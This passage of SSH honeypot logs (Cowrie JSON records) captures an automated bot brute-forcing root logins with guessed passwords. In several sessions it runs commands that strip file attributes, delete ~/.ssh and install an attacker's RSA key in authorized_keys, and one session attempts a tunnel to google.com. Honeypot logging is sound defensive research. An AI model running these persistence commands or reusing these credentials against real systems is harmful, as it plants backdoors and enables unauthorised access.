hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-28T18:22:19.497977Z","src_ip":"212.227.235.229","session":"27c4d8a819d6"}
{"eventid":"cowrie.login.failed","username":"345gs5662d34","password":"345gs5662d34","message":"login attempt [345gs5662d34/345gs5662d34] failed","sensor":"my-vps","timestamp":"2025-08-28T18:22:20.616375Z","src_ip":"212.227.235.229","session":"27c4d8a819d6"}
{"eventid":"cowrie.session.closed","duration":"2.7","message":"Connection lost after 2.7 seconds","sensor":"my-vps","timestamp":"2025-08-28T18:22:21.889124Z","src_ip":"212.227.235.229","session":"27c4d8a819d6"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":56134,"dst_ip":"1.2.3.4","dst_port":22,"session":"567257f22d7a","protocol":"ssh","message":"New connection: 212.227.235.229:56134 (1.2.3.4:22) [session: 567257f22d7a]","sensor":"my-vps","timestamp":"2025-08-28T18:22:22.160096Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-28T18:22:22.161213Z","src_ip":"212.227.235.229","session":"567257f22d7a"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-28T18:22:22.431295Z","src_ip":"212.227.235.229","session":"567257f22d7a"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":53744,"dst_ip":"1.2.3.4","dst_port":22,"session":"226492f83aee","protocol":"ssh","message":"New connection: 212.227.235.229:53744 (1.2.3.4:22) [session: 226492f83aee]","sensor":"my-vps","timestamp":"2025-08-28T18:22:22.472374Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-28T18:22:22.473403Z","src_ip":"212.227.235.229","session":"226492f83aee"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-28T18:22:22.711569Z","src_ip":"212.227.235.229","session":"226492f83aee"}
{"eventid":"cowrie.login.success","username":"root","password":"3245gs5662d34","message":"login attempt [root/3245gs5662d34] succeeded","sensor":"my-vps","timestamp":"2025-08-28T18:22:23.556272Z","src_ip":"212.227.235.229","session":"567257f22d7a"}
{"eventid":"cowrie.login.success","username":"root","password":"kaixin123","message":"login attempt [root/kaixin123] succeeded","sensor":"my-vps","timestamp":"2025-08-28T18:22:23.708985Z","src_ip":"212.227.235.229","session":"226492f83aee"}
{"eventid":"cowrie.session.closed","duration":"7.8","message":"Connection lost after 7.8 seconds","sensor":"my-vps","timestamp":"2025-08-28T18:22:23.814066Z","src_ip":"212.227.235.229","session":"4a4706aad948"}
{"eventid":"cowrie.session.closed","duration":"1.7","message":"Connection lost after 1.7 seconds","sensor":"my-vps","timestamp":"2025-08-28T18:22:23.827870Z","src_ip":"212.227.235.229","session":"567257f22d7a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T18:22:24.206030Z","src_ip":"212.227.235.229","session":"226492f83aee"}
{"eventid":"cowrie.command.input","input":"cd ~; chattr -ia .ssh; lockr -ia .ssh","message":"CMD: cd ~; chattr -ia .ssh; lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-08-28T18:22:24.206935Z","src_ip":"212.227.235.229","session":"226492f83aee"}
{"eventid":"cowrie.command.failed","input":"lockr -ia .ssh","message":"Command not found: lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-08-28T18:22:24.208405Z","src_ip":"212.227.235.229","session":"226492f83aee"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","size":32,"shasum":"c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","duplicate":true,"duration":"0.2","message":"Closing TTY Log: var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644 after 0.2 seconds","sensor":"my-vps","timestamp":"2025-08-28T18:22:24.448172Z","src_ip":"212.227.235.229","session":"226492f83aee"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T18:22:25.394964Z","src_ip":"212.227.235.229","session":"226492f83aee"}
{"eventid":"cowrie.command.input","input":"cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","message":"CMD: cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","sensor":"my-vps","timestamp":"2025-08-28T18:22:25.395780Z","src_ip":"212.227.235.229","session":"226492f83aee"}
{"eventid":"cowrie.session.file_download","duplicate":true,"outfile":"var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","shasum":"a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","destfile":"/root/.ssh/authorized_keys","message":"Saved redir contents with SHA-256 a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2 to var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","sensor":"my-vps","timestamp":"2025-08-28T18:22:25.636301Z","src_ip":"212.227.235.229","session":"226492f83aee"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","size":0,"shasum":"cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","duplicate":true,"duration":"0.2","message":"Closing TTY Log: var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f after 0.2 seconds","sensor":"my-vps","timestamp":"2025-08-28T18:22:25.637487Z","src_ip":"212.227.235.229","session":"226492f83aee"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":54564,"dst_ip":"1.2.3.4","dst_port":22,"session":"9bf4a080a8c5","protocol":"ssh","message":"New connection: 212.227.235.229:54564 (1.2.3.4:22) [session: 9bf4a080a8c5]","sensor":"my-vps","timestamp":"2025-08-28T18:22:25.858637Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-28T18:22:25.859792Z","src_ip":"212.227.235.229","session":"9bf4a080a8c5"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-28T18:22:26.091268Z","src_ip":"212.227.235.229","session":"9bf4a080a8c5"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"google.com","dst_port":443,"src_ip":"212.227.235.229","src_port":54458,"message":"direct-tcp connection request to google.com:443 from 127.0.0.1:54458","sensor":"my-vps","timestamp":"2025-08-28T18:22:27.028690Z","session":"dcfc90501a54"}
{"eventid":"cowrie.login.failed","username":"345gs5662d34","password":"345gs5662d34","message":"login attempt [345gs5662d34/345gs5662d34] failed","sensor":"my-vps","timestamp":"2025-08-28T18:22:27.060755Z","src_ip":"212.227.235.229","session":"9bf4a080a8c5"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"google.com","dst_port":443,"data":"b\"\\x16\\x03\\x01\\x02\\x00\\x01\\x00\\x01\\xfc\\x03\\x03CR@\\x80\\xe2(\\x0f\\x86\\x1a\\xdeg\\x8c\\xe2SF\\x9c\\xb4\\x86\\xf3\\xc7\\x14\\x16\\x81i\\xa5\\xb9\\xd2^\\xadW\\x98- \\xe2\\x81\\xc6(\\xfaW;{\\xf0\\x1bK\\x9c\\xdaY\\xc0Ry\\xd63 \\x1bw\\x9f\\x01\\xd1\\xec%\\x84u\\xd1\\x03^\\x00>\\x13\\x02\\x13\\x03\\x13\\x01\\xc0,\\xc00\\x00\\x9f\\xcc\\xa9\\xcc\\xa8\\xcc\\xaa\\xc0+\\xc0/\\x00\\x9e\\xc0$\\xc0(\\x00k\\xc0#\\xc0'\\x00g\\xc0\\n\\xc0\\x14\\x009\\xc0\\t\\xc0\\x13\\x003\\x00\\x9d\\x00\\x9c\\x00=\\x00<\\x005\\x00/\\x00\\xff\\x01\\x00\\x01u\\x00\\x00\\x00\\x0f\\x00\\r\\x00\\x00\\ngoogle.com\\x00\\x0b\\x00\\x04\\x03\\x00\\x01\\x02\\x00\\n\\x00\\x0c\\x00\\n\\x00\\x1d\\x00\\x17\\x00\\x1e\\x00\\x19\\x00\\x18\\x00\\x10\\x00\\x0e\\x00\\x0c\\x02h2\\x08http/1.1\\x00\\x16\\x00\\x00\\x00\\x17\\x00\\x00\\x001\\x00\\x00\\x00\\r\\x000\\x00.\\x04\\x03\\x05\\x03\\x06\\x03\\x08\\x07\\x08\\x08\\x08\\t\\x08\\n\\x08\\x0b\\x08\\x04\\x08\\x05\\x08\\x06\\x04\\x01\\x05\\x01\\x06\\x01\\x03\\x03\\x02\\x03\\x03\\x01\\x02\\x01\\x03\\x02\\x02\\x02\\x04\\x02\\x05\\x02\\x06\\x02\\x00+\\x00\\t\\x08\\x03\\x04\\x03\\x03\\x03\\x02\\x03\\x01\\x00-\\x00\\x02\\x01\\x01\\x003\\x00&\\x00$\\x00\\x1d\\x00 \\x9f\\x8fO\\xf094B\\xd4\\xef/\\xabe[\\xa1\\xaa\\xa8B\\xbd\\xb1\\x80\\xf0\\xab\\xbf\\x02\\x90L\\xfc\\x08AB\\xc6Z\\x00\\x15\\x00\\xb7\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\"","id":0,"message":"discarded direct-tcp forward request 0 to google.com:443 with data b\"\\x16\\x03\\x01\\x02\\x00\\x01\\x00\\x01\\xfc\\x03\\x03CR@\\x80\\xe2(\\x0f\\x86\\x1a\\xdeg\\x8c\\xe2SF\\x9c\\xb4\\x86\\xf3\\xc7\\x14\\x16\\x81i\\xa5\\xb9\\xd2^\\xadW\\x98- \\xe2\\x81\\xc6(\\xfaW;{\\xf0\\x1bK\\x9c\\xdaY\\xc0Ry\\xd63 \\x1bw\\x9f\\x01\\xd1\\xec%\\x84u\\xd1\\x03^\\x00>\\x13\\x02\\x13\\x03\\x13\\x01\\xc0,\\xc00\\x00\\x9f\\xcc\\xa9\\xcc\\xa8\\xcc\\xaa\\xc0+\\xc0/\\x00\\x9e\\xc0$\\xc0(\\x00k\\xc0#\\xc0'\\x00g\\xc0\\n\\xc0\\x14\\x009\\xc0\\t\\xc0\\x13\\x003\\x00\\x9d\\x00\\x9c\\x00=\\x00<\\x005\\x00/\\x00\\xff\\x01\\x00\\x01u\\x00\\x00\\x00\\x0f\\x00\\r\\x00\\x00\\ngoogle.com\\x00\\x0b\\x00\\x04\\x03\\x00\\x01\\x02\\x00\\n\\x00\\x0c\\x00\\n\\x00\\x1d\\x00\\x17\\x00\\x1e\\x00\\x19\\x00\\x18\\x00\\x10\\x00\\x0e\\x00\\x0c\\x02h2\\x08http/1.1\\x00\\x16\\x00\\x00\\x00\\x17\\x00\\x00\\x001\\x00\\x00\\x00\\r\\x000\\x00.\\x04\\x03\\x05\\x03\\x06\\x03\\x08\\x07\\x08\\x08\\x08\\t\\x08\\n\\x08\\x0b\\x08\\x04\\x08\\x05\\x08\\x06\\x04\\x01\\x05\\x01\\x06\\x01\\x03\\x03\\x02\\x03\\x03\\x01\\x02\\x01\\x03\\x02\\x02\\x02\\x04\\x02\\x05\\x02\\x06\\x02\\x00+\\x00\\t\\x08\\x03\\x04\\x03\\x03\\x03\\x02\\x03\\x01\\x00-\\x00\\x02\\x01\\x01\\x003\\x00&\\x00$\\x00\\x1d\\x00 \\x9f\\x8fO\\xf094B\\xd4\\xef/\\xabe[\\xa1\\xaa\\xa8B\\xbd\\xb1\\x80\\xf0\\xab\\xbf\\x02\\x90L\\xfc\\x08AB\\xc6Z\\x00\\x15\\x00\\xb7\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\"","sensor":"my-vps","timestamp":"2025-08-28T18:22:27.313638Z","src_ip":"212.227.235.229","session":"dcfc90501a54"}
{"eventid":"cowrie.session.closed","duration":"20.5","message":"Connection lost after 20.5 seconds","sensor":"my-vps","timestamp":"2025-08-28T18:22:27.714307Z","src_ip":"212.227.235.229","session":"dcfc90501a54"}
{"eventid":"cowrie.session.closed","duration":"2.4","message":"Connection lost after 2.4 seconds","sensor":"my-vps","timestamp":"2025-08-28T18:22:28.294715Z","src_ip":"212.227.235.229","session":"9bf4a080a8c5"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":55176,"dst_ip":"1.2.3.4","dst_port":22,"session":"c087277d9dff","protocol":"ssh","message":"New connection: 212.227.235.229:55176 (1.2.3.4:22) [session: c087277d9dff]","sensor":"my-vps","timestamp":"2025-08-28T18:22:28.522205Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-28T18:22:28.523337Z","src_ip":"212.227.235.229","session":"c087277d9dff"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-28T18:22:28.752884Z","src_ip":"212.227.235.229","session":"c087277d9dff"}
{"eventid":"cowrie.login.success","username":"root","password":"3245gs5662d34","message":"login attempt [root/3245gs5662d34] succeeded","sensor":"my-vps","timestamp":"2025-08-28T18:22:29.714220Z","src_ip":"212.227.235.229","session":"c087277d9dff"}
{"eventid":"cowrie.session.closed","duration":"1.4","message":"Connection lost after 1.4 seconds","sensor":"my-vps","timestamp":"2025-08-28T18:22:29.946495Z","src_ip":"212.227.235.229","session":"c087277d9dff"}
{"eventid":"cowrie.session.closed","duration":"7.5","message":"Connection lost after 7.5 seconds","sensor":"my-vps","timestamp":"2025-08-28T18:22:29.957667Z","src_ip":"212.227.235.229","session":"226492f83aee"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":50960,"dst_ip":"1.2.3.4","dst_port":22,"session":"c67579f0205d","protocol":"ssh","message":"New connection: 212.227.235.229:50960 (1.2.3.4:22) [session: c67579f0205d]","sensor":"my-vps","timestamp":"2025-08-28T18:22:35.890589Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-28T18:22:35.891388Z","src_ip":"212.227.235.229","session":"c67579f0205d"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-28T18:22:36.183697Z","src_ip":"212.227.235.229","session":"c67579f0205d"}
{"eventid":"cowrie.login.success","username":"root","password":"qaz123wsx123","message":"login attempt [root/qaz123wsx123] succeeded","sensor":"my-vps","timestamp":"2025-08-28T18:22:38.181170Z","src_ip":"212.227.235.229","session":"c67579f0205d"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T18:22:38.805918Z","src_ip":"212.227.235.229","session":"c67579f0205d"}
{"eventid":"cowrie.command.input","input":"cd ~; chattr -ia .ssh; lockr -ia .ssh","message":"CMD: cd ~; chattr -ia .ssh; lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-08-28T18:22:38.806727Z","src_ip":"212.227.235.229","session":"c67579f0205d"}
{"eventid":"cowrie.command.failed","input":"lockr -ia .ssh","message":"Command not found: lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-08-28T18:22:38.807644Z","src_ip":"212.227.235.229","session":"c67579f0205d"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","size":32,"shasum":"c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","duplicate":true,"duration":"0.3","message":"Closing TTY Log: var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644 after 0.3 seconds","sensor":"my-vps","timestamp":"2025-08-28T18:22:39.111383Z","src_ip":"212.227.235.229","session":"c67579f0205d"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T18:22:40.988854Z","src_ip":"212.227.235.229","session":"c67579f0205d"}
